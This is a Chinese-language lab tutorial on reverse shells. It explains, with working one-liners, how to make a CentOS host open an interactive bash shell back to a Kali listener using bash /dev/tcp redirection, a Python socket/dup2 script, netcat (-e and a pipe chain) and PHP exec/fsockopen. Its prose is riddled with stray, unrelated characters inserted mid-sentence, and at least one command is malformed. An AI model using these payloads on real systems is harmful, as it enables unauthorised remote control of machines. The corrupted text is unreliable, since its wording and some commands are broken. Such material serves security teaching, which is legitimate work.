實驗環(huán)境

CentOS 6.5：192.168.0.3

kali2.0：192.168.0.4

方法1：

反彈shell命令如下：

bash -i >& /dev/tcp/ip/port 0>&1

首先养盗，使用nc在kali上監(jiān)聽端口：

nc -lvp 7777

然后在CentOS6.5下輸入：

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

可以看到shell成功反彈到了kali上面泌豆，可以執(zhí)行命令：

在解釋這條反彈shell的命令原理之前，首先需要掌握幾個點拍棕。

linux文件描述符：linux shell下有三種標準的文件描述符，分別如下：

0 - stdin 代表標準輸入,使用<或<<
1 - stdout 代表標準輸出,使用>或>>
2 - stderr 代表標準錯誤輸出,使用2>或2>>

還有就是>&這個符號的含義蝙寨，最好的理解是這樣的：

當(dāng)>&后面接文件時冈爹，表示將標準輸出和標準錯誤輸出重定向至文件。
當(dāng)>&后面接文件描述符時逛绵，表示將前面的文件描述符重定向至后面的文件描述符

也有師傅把&這個符號解釋為是取地址符號怀各，學(xué)過C語言的小伙伴們都知道&這個符號代表取地址符，在C++中&符號還代表為引用术浪，這樣做是為了區(qū)分文件描述符和文件瓢对，比如查看一個不存在的文件，要把標準錯誤重定向到標準輸出胰苏，如果直接cat notexistfile 2>1的話硕蛹，則會將1看作是一個文件，將標準錯誤輸出輸出到1這個文件里而不是標準輸出,而&的作用就是為了區(qū)分文件和文件描述符：

在本地輸入設(shè)備（鍵盤）輸入命令，在本地看不到輸入的內(nèi)容桑滩，但是鍵盤輸入的命令已經(jīng)被輸出到了遠程梧疲，然后命令的執(zhí)行結(jié)果或者錯誤也會被傳到遠程，查看遠程运准，可以看到標準輸出和標準錯誤輸出都重定向到了遠程：

下面在該命令后面加上0>&1幌氮，代表將標準輸入重定向到標準輸出，這里的標準輸出已經(jīng)重定向到了/dev/tcp/ip/port這個文件胁澳，也就是遠程该互，那么標準輸入也就重定向到了遠程，這樣的話就可以直接在遠程輸入了：

那么韭畸，0>&2也是可以的宇智，代表將標準輸入重定向到標準錯誤輸出，而標準錯誤輸出重定向到了/dev/tcp/ip/port這個文件胰丁，也就是遠程随橘，那么標準輸入也就重定向到了遠程：

為了更形象的理解，下面給出了整個過程的數(shù)據(jù)流向锦庸，首先是本地的輸入輸出流向：

執(zhí)行bash -i >& /dev/tcp/ip/port 0>&1或者bash -i >& /dev/tcp/ip/port 0>&2后：

方法2：

使用python反彈机蔗，反彈shell命令如下：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先，使用nc在kali上監(jiān)聽端口：

nc -lvp 7777

在CentOS下使用python去反向連接甘萧，輸入：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

在已經(jīng)深入理解了第一種方法的原理后，下面來解釋一下python反彈shell的原理扬卷。

首先使用socket與遠程建立起連接牙言，接下來使用到了os庫的dup2方法將標準輸入、標準輸出怪得、標準錯誤輸出重定向到遠程咱枉，dup2這個方法有兩個參數(shù)卑硫，分別為文件描述符fd1和fd2，當(dāng)fd2參數(shù)存在時庞钢，就關(guān)閉fd2拔恰，然后將fd1代表的那個文件強行復(fù)制給fd2，在這里可以把fd1和fd2看作是C語言里的指針基括，將fd1賦值給fd2颜懊，就相當(dāng)于將fd2指向于s.fileno()，fileno()返回的是一個文件描述符风皿，在這里也就是建立socket連接返回的文件描述符河爹，經(jīng)過測試可以看到值為3。

于是這樣就相當(dāng)于將標準輸入(0)桐款、標準輸出(1)咸这、標準錯誤輸出(2)重定向到遠程(3)，接下來使用os的subprocess在本地開啟一個子進程魔眨，傳入?yún)?shù)“-i”使bash以交互模式啟動媳维，標準輸入、標準輸出遏暴、標準錯誤輸出又被重定向到了遠程侄刽，這樣的話就可以在遠程執(zhí)行輸入命令了。

方法3：

使用nc反彈shell,需要的條件是被反彈shell的機器安裝了nc朋凉，CentOS6.5安裝nc方法如下：

1州丹、下載安裝
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local
cd /usr/local
mv netcat-0.7.1 netcat
cd /usr/local/netcat
./configure
make && make install
2、配置
vim /etc/profile
添加以下內(nèi)容：
# set  netcat path
export NETCAT_HOME=/usr/local/netcat
export PATH=$PATH:$NETCAT_HOME/bin
保存杂彭，退出墓毒，并使配置生效：
source /etc/profile
3、測試
nc -help成功

之后在kali上使用nc監(jiān)聽端口：

nc -lvp 7777

在CentOS上使用nc去反向連接亲怠，命令如下：

nc -e /bin/bash 192.168.0.4 7777

注意之前使用nc監(jiān)聽端口反彈shell時都會有一個警告：Warning: forward host lookup failed for bogon: Unknown host,根據(jù)nc幫助文檔的提示加上-n參數(shù)就可以不產(chǎn)生這個警告了徙垫，-n參數(shù)代表在建立連接之前不對主機進行dns解析。

nc -nlvp 7777

如果nc不支持-e參數(shù)的話放棒，可以利用到linux中的管道符姻报，首先在kali上開啟監(jiān)聽：

nc -nvlp 6666nc -nvlp 7777

之后在CentOS上使用nc去反向鏈接：

nc 192.168.0.4 6666|/bin/bash|192.168.0.4 7777

iliCEIg5cL.png

方法4：

使用php反彈shell，方法如下 笆焰。
首先最簡單的一個辦法劫谅，就是使用php的exec函數(shù)執(zhí)行方法1反彈shell的命令：

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

Da1d5I1GgL.png

還有一個是之前烏云知識庫上的一個姿勢，使用php的fsockopen去連接遠程：

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

JbLmF1b3l9.png

這個姿勢看起來有一些難以理解嚷掠，尤其是還出現(xiàn)了<&這個符號捏检，當(dāng)然如果把&看著是取地址符或者是引用，那還是可以理解的不皆，為了更方便的理解贯城，我在這將這條命令稍微修改了一下，類似于前面的第二種方法霹娄。

有了之前的基礎(chǔ)能犯，我們知道3代表的是使用fsockopen函數(shù)建立socket返回的文件描述符，這里將標準輸入犬耻，標準輸出和標準錯誤輸出都重定向到了遠程

在CentOS上反向連接踩晶，輸入：

php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

B0c9GjFmD5.png

注意php反彈shell的這些方法都需要php關(guān)閉safe_mode這個選項，才可以使用exec函數(shù)香追。